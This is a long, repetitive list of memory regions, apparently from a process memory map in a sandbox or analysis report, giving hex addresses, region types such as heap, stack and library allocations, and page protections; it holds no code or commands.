heap
page read and write
2610000
heap
page read and write
2F1B000
trusted library allocation
page read and write
1D61000
trusted library allocation
page read and write
22A6000
trusted library allocation
page read and write
2CFD000
trusted library allocation
page read and write
1F76000
trusted library allocation
page read and write
2CAF000
stack
page read and write
2790000
trusted library allocation
page read and write
28F7000
trusted library allocation
page read and write
2F02000
heap
page read and write
37C0000
heap
page read and write
2F0C000
heap
page read and write
1F76000
trusted library allocation
page read and write
1E14000
heap
page read and write
2707000
trusted library allocation
page read and write
24A0000
heap
page read and write
271C000
trusted library allocation
page read and write
441B000
trusted library allocation
page read and write
4255000
heap
page read and write
7FF001F7000
trusted library allocation
page read and write
820000
trusted library allocation
page read and write
2F9E000
stack
page read and write
1F44000
trusted library allocation
page read and write
1F61000
trusted library allocation
page read and write
2ED0000
heap
page read and write
23C000
stack
page read and write
770000
trusted library allocation
page read and write
4424000
trusted library allocation
page read and write
4424000
trusted library allocation
page read and write
2CFD000
trusted library allocation
page read and write
2242000
heap
page read and write
10000
heap
page read and write
4424000
trusted library allocation
page read and write
2EDD000
heap
page read and write
2EA6000
trusted library allocation
page read and write
2DCE000
stack
page read and write
2F18000
heap
page read and write
2EF4000
heap
page read and write
32D000
heap
page read and write
3A5000
heap
page read and write
2CFA000
trusted library allocation
page read and write
2D0A000
trusted library allocation
page read and write
F20000
heap
page read and write
2FA0000
trusted library allocation
page read and write
833E000
trusted library allocation
page read and write
6C4000
heap
page read and write
402000
heap
page read and write
1F88000
trusted library allocation
page read and write
7EFAF000
unkown
page read and write
379000
heap
page read and write
25AF000
trusted library allocation
page read and write
35A7000
trusted library allocation
page read and write
276E000
unkown
page read and write
2C49000
trusted library allocation
page read and write
30E0000
trusted library allocation
page read and write
48A000
heap
page read and write
10053000
unkown
page read and write
1E0000
heap
page read and write
68D000
heap
page read and write
28F7000
trusted library allocation
page read and write
22DE000
stack
page read and write
4433000
trusted library allocation
page read and write
2E7F000
heap
page read and write
1F68000
trusted library allocation
page read and write
1EC000
stack
page read and write
43F0000
trusted library allocation
page read and write
10000
heap
page read and write
360000
heap
page read and write
2CFA000
trusted library allocation
page read and write
2F92000
trusted library allocation
page read and write
2E55000
heap
page read and write
10057000
unkown
page read and write
2CEB000
trusted library allocation
page read and write
1B0000
trusted library allocation
page read and write
25AF000
trusted library allocation
page read and write
2F5E000
stack
page read and write
441000
heap
page read and write
2EA000
stack
page read and write
23E0000
trusted library allocation
page read and write
4433000
trusted library allocation
page read and write
2F21000
trusted library allocation
page read and write
35D3000
trusted library allocation
page read and write
441B000
trusted library allocation
page read and write
24AD000
trusted library allocation
page read and write
2E90000
heap
page read and write
24F0000
trusted library allocation
page read and write
4A80000
heap
page read and write
2ED6000
heap
page read and write
25AF000
trusted library allocation
page read and write
1F88000
trusted library allocation
page read and write
1F44000
trusted library allocation
page read and write
2E55000
heap
page read and write
4AE000
heap
page read and write
2FCE000
stack
page read and write
4EA000
heap
page read and write
2EAE000
stack
page read and write
38D000
heap
page read and write
2CF4000
trusted library allocation
page read and write
89E000
stack
page read and write
2C20000
heap
page read and write
2320000
trusted library allocation
page read and write
91AE000
trusted library allocation
page read and write
1F61000
trusted library allocation
page read and write
1F61000
trusted library allocation
page read and write
3AE000
stack
page read and write
1005A000
unkown
page readonly
2ECB000
heap
page read and write
25AF000
trusted library allocation
page read and write
2EE3000
heap
page read and write
7FF00210000
trusted library allocation
page execute and read and write
2420000
trusted library allocation
page read and write
2330000
trusted library allocation
page read and write
12CB1000
trusted library allocation
page read and write
24D0000
heap
page read and write
A68000
heap
page read and write
1F76000
trusted library allocation
page read and write
23D0000
heap
page read and write
48B7000
heap
page read and write
4424000
trusted library allocation
page read and write
320000
heap
page read and write
29CE000
stack
page read and write
1F44000
trusted library allocation
page read and write
2F79000
trusted library allocation
page read and write
2CEB000
trusted library allocation
page read and write
2ED4000
heap
page read and write
2F2F000
heap
page read and write
35B4000
trusted library allocation
page read and write
306A000
trusted library allocation
page read and write
8EFE000
trusted library allocation
page read and write
9A000
stack
page read and write
4433000
trusted library allocation
page read and write
2D0F000
trusted library allocation
page read and write
2E63000
heap
page read and write
4424000
trusted library allocation
page read and write
2A10000
heap
page execute and read and write
2F48000
trusted library allocation
page read and write
7FF001B0000
trusted library allocation
page read and write
1F88000
trusted library allocation
page read and write
2CFD000
trusted library allocation
page read and write
91AE000
trusted library allocation
page read and write
2F02000
heap
page read and write
3E6000
heap
page read and write
2FF5000
trusted library allocation
page read and write
1B808000
heap
page read and write
820000
heap
page read and write
271A000
trusted library allocation
page read and write
48D2000
heap
page read and write
270000
unkown
page readonly
2E1E000
stack
page read and write
305B000
trusted library allocation
page read and write
2F0C000
heap
page read and write
A70000
trusted library allocation
page read and write
2F3E000
stack
page read and write
3050000
trusted library allocation
page read and write
2E55000
heap
page read and write
718000
heap
page read and write
10000000
unkown
page readonly
3DE000
heap
page read and write
885E000
trusted library allocation
page read and write
828E000
trusted library allocation
page read and write
1005A000
unkown
page readonly
305E000
trusted library allocation
page read and write
2EEA000
heap
page read and write
2850000
trusted library allocation
page read and write
35CD000
trusted library allocation
page read and write
1F76000
trusted library allocation
page read and write
2F43000
trusted library allocation
page read and write
4433000
trusted library allocation
page read and write
10046000
unkown
page readonly
10000000
unkown
page readonly
26B0000
trusted library allocation
page execute
10046000
unkown
page readonly
31F5000
trusted library allocation
page read and write
400000
heap
page read and write
2F3A000
trusted library allocation
page read and write
4424000
trusted library allocation
page read and write
2EDA000
heap
page read and write
444000
heap
page read and write
8E0E000
trusted library allocation
page read and write
2E68000
heap
page read and write
2650000
trusted library allocation
page read and write
8A0000
trusted library allocation
page read and write
2CF4000
trusted library allocation
page read and write
2B0000
heap
page read and write
376000
heap
page read and write
271C000
trusted library allocation
page read and write
25AF000
trusted library allocation
page read and write
1FA5000
heap
page read and write
A40000
heap
page read and write
2850000
trusted library allocation
page read and write
3170000
trusted library allocation
page read and write
2CFD000
trusted library allocation
page read and write
2F01000
heap
page read and write
71A000
heap
page read and write
2FA0000
trusted library allocation
page read and write
10000000
unkown
page readonly
7FF001D0000
trusted library allocation
page read and write
2E91000
heap
page read and write
2E20000
trusted library allocation
page read and write
8FAE000
trusted library allocation
page read and write
10057000
unkown
page read and write
24AD000
trusted library allocation
page read and write
10057000
unkown
page read and write
25AF000
trusted library allocation
page read and write
6A0000
heap
page read and write
2630000
trusted library allocation
page read and write
8D4000
heap
page read and write
10053000
unkown
page read and write
23A6000
trusted library allocation
page read and write
2CFD000
trusted library allocation
page read and write
2740000
heap
page read and write
2FDE000
trusted library allocation
page read and write
28F7000
trusted library allocation
page read and write
7FF00230000
trusted library allocation
page execute and read and write
6E0000
heap
page read and write
2707000
trusted library allocation
page read and write
2DE0000
trusted library allocation
page read and write
2850000
trusted library allocation
page read and write
24B7000
trusted library allocation
page read and write
294E000
unkown
page read and write
4AE000
heap
page read and write
2AC0000
trusted library allocation
page read and write
10053000
unkown
page read and write
2CF4000
trusted library allocation
page read and write
8FAE000
trusted library allocation
page read and write
24BE000
trusted library allocation
page read and write
1F88000
trusted library allocation
page read and write
8D3E000
trusted library allocation
page read and write
3A68000
trusted library allocation
page read and write
25AF000
trusted library allocation
page read and write
2F0C000
heap
page read and write
28F7000
trusted library allocation
page read and write
4424000
trusted library allocation
page read and write
1F61000
trusted library allocation
page read and write
4896000
heap
page read and write
63A000
heap
page read and write
24B9000
trusted library allocation
page read and write
B50000
heap
page read and write
2FAB000
trusted library allocation
page read and write
2CFA000
trusted library allocation
page read and write
2250000
trusted library allocation
page read and write
935000
trusted library allocation
page read and write
2EB0000
heap
page read and write
28C4000
heap
page read and write
520000
heap
page read and write
2F16000
heap
page read and write
48CC000
heap
page read and write
1F76000
trusted library allocation
page read and write
4880000
heap
page read and write
2F19000
heap
page read and write
1AD10000
trusted library allocation
page read and write
1F88000
trusted library allocation
page read and write
2EB0000
trusted library allocation
page read and write
2530000
trusted library allocation
page read and write
2E6C000
heap
page read and write
2CFA000
trusted library allocation
page read and write
10057000
unkown
page read and write
450000
heap
page read and write
2EB9000
heap
page read and write
2980000
trusted library allocation
page read and write
2EFF000
trusted library allocation
page read and write
7FF00190000
trusted library allocation
page read and write
4424000
trusted library allocation
page read and write
7FF000F0000
trusted library allocation
page read and write
2DE0000
trusted library allocation
page read and write
190000
heap
page read and write
28F7000
trusted library allocation
page read and write
271C000
trusted library allocation
page read and write
308A000
stack
page read and write
744000
heap
page read and write
24BF000
trusted library allocation
page read and write
402000
heap
page read and write
2E70000
unkown
page read and write
2EF9000
trusted library allocation
page read and write
48CC000
heap
page read and write
2630000
trusted library allocation
page read and write
25E6000
trusted library allocation
page read and write
2CFA000
trusted library allocation
page read and write
7FF0003C000
trusted library allocation
page execute and read and write
6E8000
heap
page read and write
8FAE000
trusted library allocation
page read and write
430000
heap
page read and write
2F19000
heap
page read and write
48B000
heap
page read and write
2CFD000
trusted library allocation
page read and write
365E000
trusted library allocation
page read and write
848E000
trusted library allocation
page read and write
7FF001E0000
trusted library allocation
page execute and read and write
10000
heap
page read and write
40C000
heap
page read and write
1F88000
trusted library allocation
page read and write
1F61000
trusted library allocation
page read and write
2F48000
trusted library allocation
page read and write
2E8D000
heap
page read and write
28F7000
trusted library allocation
page read and write
2EE3000
heap
page read and write
2CFA000
trusted library allocation
page read and write
2D05000
trusted library allocation
page read and write
902E000
trusted library allocation
page read and write
10000000
unkown
page readonly
266000
trusted library allocation
page read and write
2850000
trusted library allocation
page read and write
903E000
trusted library allocation
page read and write
2CF4000
trusted library allocation
page read and write
4433000
trusted library allocation
page read and write
3578000
trusted library allocation
page read and write
26F7000
trusted library allocation
page read and write
318A000
trusted library allocation
page read and write
2CF4000
trusted library allocation
page read and write
340000
heap
page read and write
2B04000
trusted library allocation
page read and write
359E000
trusted library allocation
page read and write
10000
heap
page read and write
E70000
heap
page read and write
2F02000
heap
page read and write
2F48000
trusted library allocation
page read and write
23E0000
trusted library allocation
page read and write
615000
trusted library allocation
page read and write
2ED4000
heap
page read and write
2CF4000
trusted library allocation
page read and write
290000
heap
page read and write
25AF000
trusted library allocation
page read and write
12CB5000
trusted library allocation
page read and write
2707000
trusted library allocation
page read and write
24B7000
trusted library allocation
page read and write
86EE000
trusted library allocation
page read and write
28F7000
trusted library allocation
page read and write
160000
heap
page read and write
2850000
trusted library allocation
page read and write
1F61000
trusted library allocation
page read and write
1F76000
trusted library allocation
page read and write
2E9D000
heap
page read and write
7FF00250000
trusted library allocation
page execute and read and write
7FF00270000
trusted library allocation
page read and write
8EFE000
trusted library allocation
page read and write
1F34000
trusted library allocation
page read and write
2E0000
trusted library allocation
page read and write
2CFA000
trusted library allocation
page read and write
2ED0000
heap
page read and write
8EFE000
trusted library allocation
page read and write
2C42000
heap
page read and write
457000
heap
page read and write
4433000
trusted library allocation
page read and write
2886000
trusted library allocation
page read and write
30000
heap
page read and write
48CC000
heap
page read and write
170000
heap
page read and write
272D000
stack
page read and write
24A9000
trusted library allocation
page read and write
7FF000E2000
trusted library allocation
page execute and read and write
10053000
unkown
page read and write
243E000
stack
page read and write
2CFA000
trusted library allocation
page read and write
2EEF000
heap
page read and write
858E000
trusted library allocation
page read and write
7FF00160000
trusted library allocation
page read and write
441B000
trusted library allocation
page read and write
2ED5000
trusted library allocation
page read and write
1F88000
trusted library allocation
page read and write
2941000
trusted library allocation
page execute
1F88000
trusted library allocation
page read and write
A98000
heap
page read and write
8C6E000
trusted library allocation
page read and write
1F68000
trusted library allocation
page read and write
8A0000
heap
page read and write
2C60000
trusted library allocation
page read and write
2D0E000
trusted library allocation
page read and write
48AF000
heap
page read and write
2F2E000
heap
page read and write
31D0000
trusted library allocation
page read and write
23DE000
stack
page read and write
7FF00180000
trusted library allocation
page execute and read and write
2F02000
heap
page read and write
25BE000
stack
page read and write
46E000
stack
page read and write
2EE000
heap
page read and write
1F88000
trusted library allocation
page read and write
1E50000
trusted library section
page read and write
271C000
trusted library allocation
page read and write
305E000
stack
page read and write
30DE000
stack
page read and write
1F60000
trusted library allocation
page read and write
48CC000
heap
page read and write
28F7000
trusted library allocation
page read and write
7FF00280000
trusted library allocation
page execute and read and write
37B6000
trusted library allocation
page read and write
48B000
heap
page read and write
2C0000
trusted library allocation
page read and write
238F000
stack
page read and write
2EBB000
heap
page read and write
31C000
heap
page read and write
2E0000
heap
page read and write
295E000
stack
page read and write
2FBF000
trusted library allocation
page read and write
24B7000
trusted library allocation
page read and write
2850000
trusted library allocation
page read and write
429000
heap
page read and write
2D8000
heap
page read and write
2DE0000
trusted library allocation
page read and write
2346000
trusted library allocation
page read and write
2CFD000
trusted library allocation
page read and write
2CFA000
trusted library allocation
page read and write
24B3000
trusted library allocation
page read and write
2850000
trusted library allocation
page read and write
1F68000
trusted library allocation
page read and write
2CEB000
trusted library allocation
page read and write
3195000
trusted library allocation
page read and write
4259000
heap
page read and write
24B7000
trusted library allocation
page read and write
12CDC000
trusted library allocation
page read and write
27CA000
trusted library allocation
page read and write
2600000
unkown
page read and write
911E000
trusted library allocation
page read and write
2707000
trusted library allocation
page read and write
2C60000
trusted library allocation
page read and write
930000
heap
page read and write
280000
heap
page read and write
23C0000
heap
page read and write
3240000
heap
page read and write
2C49000
trusted library allocation
page read and write
247E000
stack
page read and write
1F5D000
stack
page read and write
2850000
trusted library allocation
page read and write
10000000
unkown
page readonly
25AF000
trusted library allocation
page read and write
B28000
heap
page read and write
2CF4000
trusted library allocation
page read and write
24A7000
trusted library allocation
page read and write
4424000
trusted library allocation
page read and write
2280000
trusted library allocation
page read and write
24B7000
trusted library allocation
page read and write
2424000
trusted library section
page readonly
2EED000
heap
page read and write
42B000
heap
page read and write
2EED000
heap
page read and write
284F000
stack
page read and write
336000
heap
page read and write
48CF000
heap
page read and write
336000
heap
page read and write
3E8000
heap
page read and write
8BBE000
trusted library allocation
page read and write
4424000
trusted library allocation
page read and write
30D0000
trusted library allocation
page read and write
2D0B000
trusted library allocation
page read and write
2EF1000
heap
page read and write
25AF000
trusted library allocation
page read and write
2696000
trusted library allocation
page read and write
2CFA000
trusted library allocation
page read and write
1F88000
trusted library allocation
page read and write
25AF000
trusted library allocation
page read and write
2E74000
heap
page read and write
1ED0000
trusted library allocation
page read and write
240000
heap
page read and write
3A0000
trusted library allocation
page read and write
30E0000
trusted library allocation
page read and write
4433000
trusted library allocation
page read and write
24B7000
trusted library allocation
page read and write
4424000
trusted library allocation
page read and write
2E6E000
stack
page read and write
1F34000
trusted library allocation
page read and write
1F44000
trusted library allocation
page read and write
910000
heap
page read and write
2850000
trusted library allocation
page read and write
43F000
heap
page read and write
24C5000
trusted library allocation
page read and write
390000
heap
page read and write
28F7000
trusted library allocation
page read and write
2ED4000
heap
page read and write
8CAE000
trusted library allocation
page read and write
2D08000
trusted library allocation
page read and write
25AF000
trusted library allocation
page read and write
8C6E000
trusted library allocation
page read and write
8D0000
heap
page read and write
2F1D000
heap
page read and write
2CFA000
trusted library allocation
page read and write
33F000
heap
page read and write
2E6E000
heap
page read and write
2CFA000
trusted library allocation
page read and write
381000
heap
page read and write
1E42000
trusted library section
page read and write
2650000
trusted library allocation
page read and write
2B7000
heap
page read and write
2EF1000
heap
page read and write
2850000
trusted library allocation
page read and write
BB000
stack
page read and write
23A5000
trusted library allocation
page read and write
441B000
trusted library allocation
page read and write
318000
heap
page read and write
2F11000
trusted library allocation
page read and write
2CFD000
trusted library allocation
page read and write
2D06000
trusted library allocation
page read and write
2AA0000
trusted library allocation
page read and write
2E68000
heap
page read and write
24B7000
trusted library allocation
page read and write
2CFD000
trusted library allocation
page read and write
6E7000
heap
page read and write
301D000
trusted library allocation
page read and write
35E0000
trusted library allocation
page read and write
2EB5000
heap
page read and write
1F76000
trusted library allocation
page read and write
28F7000
trusted library allocation
page read and write
1F88000
trusted library allocation
page read and write
28F7000
trusted library allocation
page read and write
48B3000
heap
page read and write
2450000
heap
page read and write
3048000
trusted library allocation
page read and write
2850000
trusted library allocation
page read and write
2345000
trusted library allocation
page read and write
1F68000
trusted library allocation
page read and write
23A000
stack
page read and write
7FF00170000
trusted library allocation
page execute and read and write
2DC000
stack
page read and write
4424000
trusted library allocation
page read and write
2E68000
heap
page read and write
8D0000
heap
page read and write
3060000
trusted library allocation
page read and write
1005A000
unkown
page readonly
17C000
stack
page read and write
833E000
trusted library allocation
page read and write
2400000
heap
page read and write
24B7000
trusted library allocation
page read and write
2CFD000
trusted library allocation
page read and write
4424000
trusted library allocation
page read and write
25AF000
trusted library allocation
page read and write
43EE000
stack
page read and write
2707000
trusted library allocation
page read and write
8DF000
unkown
page read and write
441B000
trusted library allocation
page read and write
AA0000
heap
page read and write
2D7F000
stack
page read and write
2CF4000
trusted library allocation
page read and write
24CF000
stack
page read and write
2EE6000
heap
page read and write
6E0000
heap
page read and write
2CFD000
trusted library allocation
page read and write
35E6000
trusted library allocation
page read and write
320000
heap
page read and write
24D5000
trusted library allocation
page read and write
488000
heap
page read and write
2EDA000
heap
page read and write
920000
heap
page read and write
85AE000
trusted library allocation
page read and write
42D000
heap
page read and write
388000
heap
page read and write
271C000
trusted library allocation
page read and write
2F16000
heap
page read and write
2850000
trusted library allocation
page read and write
2707000
trusted library allocation
page read and write
28DF000
stack
page read and write
1B7E8000
heap
page read and write
5F0000
trusted library allocation
page read and write
2440000
trusted library allocation
page read and write
2CEB000
trusted library allocation
page read and write
2705000
trusted library allocation
page read and write
2470000
trusted library allocation
page read and write
839E000
trusted library allocation
page read and write
3E0000
heap
page read and write
488D000
heap
page read and write
24B4000
trusted library allocation
page read and write
1F61000
trusted library allocation
page read and write
318000
heap
page read and write
474000
heap
page read and write
2CFD000
trusted library allocation
page read and write
225000
trusted library allocation
page read and write
24A6000
trusted library allocation
page read and write
2F17000
heap
page read and write
28F7000
trusted library allocation
page read and write
32D000
heap
page read and write
35A4000
trusted library allocation
page read and write
1BE0E000
stack
page read and write
110000
heap
page read and write
28DE000
stack
page read and write
2EE0000
trusted library allocation
page read and write
33F000
heap
page read and write
321A000
trusted library allocation
page read and write
27C0000
trusted library allocation
page read and write
24D5000
trusted library allocation
page read and write
1F88000
trusted library allocation
page read and write
24F6000
trusted library allocation
page read and write
10000
heap
page read and write
2CFD000
trusted library allocation
page read and write
24D5000
trusted library allocation
page read and write
900000
heap
page read and write
3A5000
heap
page read and write
54C000
heap
page read and write
2E70000
trusted library allocation
page read and write
2F9F000
trusted library allocation
page read and write
4424000
trusted library allocation
page read and write
27EE000
unkown
page read and write
2F1E000
trusted library allocation
page read and write
2E6D000
heap
page read and write
1F34000
trusted library allocation
page read and write
A60000
heap
page read and write
3BA000
heap
page read and write
3045000
trusted library allocation
page read and write
280000
heap
page read and write
1EC1000
trusted library allocation
page read and write
2F38000
trusted library allocation
page read and write
306D000
trusted library allocation
page read and write
74A000
heap
page read and write
4433000
trusted library allocation
page read and write
423000
heap
page read and write
10053000
unkown
page read and write
48B1000
heap
page read and write
2850000
trusted library allocation
page read and write
10053000
unkown
page read and write
1EDA000
trusted library allocation
page read and write
2F0000
heap
page read and write
1C50000
heap
page read and write
290A000
trusted library allocation
page read and write
844E000
trusted library allocation
page read and write
2CEB000
trusted library allocation
page read and write
2F16000
heap
page read and write
2F19000
heap
page read and write
270D000
trusted library allocation
page read and write
195000
stack
page read and write | page guard
4424000
trusted library allocation
page read and write
2CAE000
stack
page read and write | page guard
231E000
stack
page read and write
2E80000
trusted library allocation
page read and write
2CFD000
trusted library allocation
page read and write
24AD000
trusted library allocation
page read and write
24B7000
trusted library allocation
page read and write
2707000
trusted library allocation
page read and write
48B000
heap
page read and write
28F7000
trusted library allocation
page read and write
2F16000
heap
page read and write
2E46000
trusted library allocation
page read and write
2FD0000
trusted library allocation
page read and write
6B0000
heap
page read and write
48B5000
heap
page read and write
8CAE000
trusted library allocation
page read and write
10046000
unkown
page readonly
4433000
trusted library allocation
page read and write
427000
heap
page read and write
41A000
heap
page read and write
29A000
stack
page read and write
2EDD000
heap
page read and write
1F61000
trusted library allocation
page read and write
7FF00260000
trusted library allocation
page execute and read and write
2920000
trusted library allocation
page read and write
911E000
trusted library allocation
page read and write
2D03000
trusted library allocation
page read and write
1F61000
trusted library allocation
page read and write
8D3E000
trusted library allocation
page read and write
837E000
trusted library allocation
page read and write
2EE8000
heap
page read and write
48D2000
heap
page read and write
844E000
trusted library allocation
page read and write
4897000
heap
page read and write
7FF00122000
trusted library allocation
page execute and read and write
2D50000
trusted library allocation
page read and write
2CFD000
trusted library allocation
page read and write
2D10000
trusted library allocation
page read and write
27E000
heap
page read and write
4433000
trusted library allocation
page read and write
2C7000
heap
page read and write
10000000
unkown
page readonly
28F7000
trusted library allocation
page read and write
25AF000
trusted library allocation
page read and write
25AF000
trusted library allocation
page read and write
1F44000
trusted library allocation
page read and write
4433000
trusted library allocation
page read and write
2CFA000
trusted library allocation
page read and write
24A0000
trusted library allocation
page read and write
1005A000
unkown
page readonly
858E000
trusted library allocation
page read and write
24A9000
trusted library allocation
page read and write
2FA0000
trusted library allocation
page read and write
316D000
trusted library allocation
page read and write
2E7000
heap
page read and write
2850000
trusted library allocation
page read and write
730000
heap
page read and write
24B7000
trusted library allocation
page read and write
2836000
trusted library allocation
page read and write
304B000
trusted library allocation
page read and write
28F7000
trusted library allocation
page read and write
524000
heap
page read and write
8C6000
trusted library allocation
page read and write
379000
heap
page read and write
1F88000
trusted library allocation
page read and write
6A7000
heap
page read and write
2EB0000
heap
page read and write
4433000
trusted library allocation
page read and write
2D0F000
trusted library allocation
page read and write
1C8B0000
heap
page read and write
345000
heap
page read and write
2EFC000
trusted library allocation
page read and write
2E68000
heap
page read and write
10046000
unkown
page readonly
1F76000
trusted library allocation
page read and write
304000
heap
page read and write
4AA9000
heap
page read and write
B20000
heap
page read and write
381000
heap
page read and write
25E5000
trusted library allocation
page read and write
2FA0000
trusted library allocation
page read and write
2D04000
trusted library allocation
page read and write
747000
heap
page read and write
1F68000
trusted library allocation
page read and write
2D9E000
stack
page read and write
688000
heap
page read and write
846000
trusted library allocation
page read and write
441B000
trusted library allocation
page read and write
2CF4000
trusted library allocation
page read and write
430000
heap
page read and write
2280000
trusted library allocation
page read and write
2520000
heap
page read and write
2CEB000
trusted library allocation
page read and write
26F4000
trusted library allocation
page read and write
1F76000
trusted library allocation
page read and write
2900000
trusted library allocation
page read and write
2DE0000
trusted library allocation
page read and write
1D0000
unkown
page readonly
1F88000
trusted library allocation
page read and write
2CFA000
trusted library allocation
page read and write
2702000
trusted library allocation
page read and write
6ED000
heap
page read and write
3C0000
heap
page read and write
8FAE000
trusted library allocation
page read and write
48B1000
heap
page read and write
1C82E000
stack
page read and write
2FF5000
trusted library allocation
page read and write
2CFA000
trusted library allocation
page read and write
2CFA000
trusted library allocation
page read and write
8FBE000
trusted library allocation
page read and write
2F9B000
trusted library allocation
page read and write
270C000
trusted library allocation
page read and write
2D01000
trusted library allocation
page read and write
42C000
heap
page read and write
887E000
trusted library allocation
page read and write
271C000
trusted library allocation
page read and write
2756000
trusted library allocation
page read and write
48D2000
heap
page read and write
435000
heap
page read and write
1F34000
trusted library allocation
page read and write
2700000
trusted library allocation
page read and write
4AE000
heap
page read and write
903E000
trusted library allocation
page read and write
2EB0000
heap
page read and write
2BCE000
stack
page read and write
29EC000
stack
page read and write
441B000
trusted library allocation
page read and write
2740000
heap
page read and write
490000
heap
page read and write
470000
heap
page read and write
2EF1000
heap
page read and write
397000
heap
page read and write
48B0000
heap
page read and write
2E3F000
heap
page read and write
2F85000
trusted library allocation
page read and write
86EE000
trusted library allocation
page read and write
1F68000
trusted library allocation
page read and write
2D8000
heap
page read and write
10046000
unkown
page readonly
2EDD000
heap
page read and write
2A86000
heap
page read and write
279F000
stack
page read and write
48B6000
heap
page read and write
4AE000
heap
page read and write
24A3000
trusted library allocation
page read and write
2EEA000
heap
page read and write
3050000
trusted library allocation
page read and write
71D000
heap
page read and write
2860000
trusted library allocation
page read and write
4F1000
heap
page read and write
2EED000
heap
page read and write
31D0000
trusted library allocation
page read and write
2EF1000
heap
page read and write
2240000
heap
page read and write
1F61000
trusted library allocation
page read and write
1F68000
trusted library allocation
page read and write
5F4000
heap
page read and write
3F6000
trusted library allocation
page read and write
6DD000
heap
page read and write
1F68000
trusted library allocation
page read and write
2E2B000
stack
page read and write
2224000
heap
page read and write
2E45000
trusted library allocation
page read and write
2D07000
trusted library allocation
page read and write
7E0000
heap
page read and write
25AF000
trusted library allocation
page read and write
2470000
trusted library allocation
page read and write
24B7000
trusted library allocation
page read and write
1F61000
trusted library allocation
page read and write
2EBD000
heap
page read and write
2DEE000
stack
page read and write
2F0C000
heap
page read and write
4A4000
heap
page read and write
2B00000
trusted library allocation
page read and write
2850000
trusted library allocation
page read and write
2E93000
heap
page read and write
26C000
stack
page read and write
7FF001A0000
trusted library allocation
page execute and read and write
7FF00200000
trusted library allocation
page read and write
1F0000
trusted library allocation
page read and write
2920000
trusted library allocation
page read and write
24BD000
trusted library allocation
page read and write
2F16000
heap
page read and write
8EFE000
trusted library allocation
page read and write
1A0000
heap
page execute and read and write
1005A000
unkown
page readonly
48CB000
heap
page read and write
3F0000
heap
page read and write
7FF0025D000
trusted library allocation
page execute and read and write
26FA000
trusted library allocation
page read and write
255C000
stack
page read and write
24B7000
trusted library allocation
page read and write
1F61000
trusted library allocation
page read and write
26F9000
trusted library allocation
page read and write
10046000
unkown
page readonly
34B2000
trusted library allocation
page read and write
2ECB000
heap
page read and write
2CFD000
trusted library allocation
page read and write
12F62000
trusted library allocation
page read and write
248E000
stack
page read and write
8D3E000
trusted library allocation
page read and write
2435000
trusted library allocation
page read and write
3588000
trusted library allocation
page read and write
48CC000
heap
page read and write
4B0000
heap
page read and write
2ECB000
heap
page read and write
2CFA000
trusted library allocation
page read and write
3A44000
trusted library allocation
page read and write
23E0000
heap
page read and write
24AB000
trusted library allocation
page read and write
2CE5000
trusted library allocation
page read and write
431000
heap
page read and write
441B000
trusted library allocation
page read and write
23A6000
trusted library allocation
page read and write
1B780000
heap
page read and write
271A000
trusted library allocation
page read and write
24B7000
trusted library allocation
page read and write
2CF4000
trusted library allocation
page read and write
4B8000
heap
page read and write
2E82000
heap
page read and write
700000
trusted library allocation
page read and write
255000
unkown
page read and write
2F16000
heap
page read and write
8D3E000
trusted library allocation
page read and write
48B5000
heap
page read and write
480000
heap
page read and write
1F61000
trusted library allocation
page read and write
1F88000
trusted library allocation
page read and write
2300000
heap
page read and write
2FA0000
trusted library allocation
page read and write
2E55000
heap
page read and write
2FA0000
trusted library allocation
page read and write
2460000
heap
page read and write
2CF4000
trusted library allocation
page read and write
48D2000
heap
page read and write
2440000
trusted library allocation
page read and write
1CAB0000
heap
page read and write
3C0000
heap
page read and write
271A000
trusted library allocation
page read and write
2850000
trusted library allocation
page read and write
428000
heap
page read and write
2701000
trusted library allocation
page read and write
2F48000
trusted library allocation
page read and write
254C000
stack
page read and write
195000
trusted library allocation
page read and write
28E0000
trusted library allocation
page read and write
1F61000
trusted library allocation
page read and write
4897000
heap
page read and write
48B000
heap
page read and write
2EE3000
heap
page read and write
7FF0002A000
trusted library allocation
page execute and read and write
1F68000
trusted library allocation
page read and write
2EEF000
heap
page read and write
2ED6000
heap
page read and write
35DC000
stack
page read and write
24AD000
trusted library allocation
page read and write
8FAE000
trusted library allocation
page read and write
2850000
trusted library allocation
page read and write
10053000
unkown
page read and write
2850000
trusted library allocation
page read and write
2F40000
trusted library allocation
page read and write
26F3000
trusted library allocation
page read and write
902E000
trusted library allocation
page read and write
302B000
trusted library allocation
page read and write
616000
trusted library allocation
page read and write
35E9000
trusted library allocation
page read and write
43F0000
trusted library allocation
page read and write
2850000
trusted library allocation
page read and write
2943000
trusted library allocation
page execute
2707000
trusted library allocation
page read and write
2E65000
heap
page read and write
3273000
trusted library allocation
page read and write
2C49000
trusted library allocation
page read and write
25AF000
trusted library allocation
page read and write
28C0000
heap
page read and write
2707000
trusted library allocation
page read and write
3051000
trusted library allocation
page read and write
240000
trusted library allocation
page read and write
271C000
trusted library allocation
page read and write
441B000
trusted library allocation
page read and write
478000
heap
page read and write
2824000
heap
page read and write
837E000
trusted library allocation
page read and write
2420000
trusted library section
page readonly
1B9F0000
heap
page read and write
12E21000
trusted library allocation
page read and write
A96000
trusted library allocation
page read and write
10000000
unkown
page readonly
3F5000
trusted library allocation
page read and write
314E000
trusted library allocation
page read and write
374000
heap
page read and write
1F68000
trusted library allocation
page read and write
3060000
trusted library allocation
page read and write
4883000
heap
page read and write
31B8000
trusted library allocation
page read and write
24A5000
trusted library allocation
page read and write
EB000
stack
page read and write
2747000
heap
page read and write
2F16000
heap
page read and write
35BD000
trusted library allocation
page read and write
42F000
heap
page read and write
22B000
stack
page read and write
2750000
heap
page read and write
24B5000
trusted library allocation
page read and write
2850000
trusted library allocation
page read and write
10046000
unkown
page readonly
2E41000
heap
page read and write
2C49000
trusted library allocation
page read and write
10057000
unkown
page read and write
24B7000
trusted library allocation
page read and write
3050000
trusted library allocation
page read and write
303F000
trusted library allocation
page read and write
170000
heap
page read and write
2850000
trusted library allocation
page read and write
304E000
trusted library allocation
page read and write
1C7AE000
stack
page read and write
2EF1000
heap
page read and write
2EF2000
trusted library allocation
page read and write
1F88000
trusted library allocation
page read and write
54C000
heap
page read and write
7FF001C0000
trusted library allocation
page execute and read and write
2730000
trusted library allocation
page read and write
24D5000
trusted library allocation
page read and write
248000
heap
page read and write
4424000
trusted library allocation
page read and write
4433000
trusted library allocation
page read and write
42D000
heap
page read and write
2850000
trusted library allocation
page read and write
85AE000
trusted library allocation
page read and write
885E000
trusted library allocation
page read and write
4885000
heap
page read and write
8EFE000
trusted library allocation
page read and write
2707000
trusted library allocation
page read and write
2EE8000
heap
page read and write
2E2E000
stack
page read and write
1E34000
heap
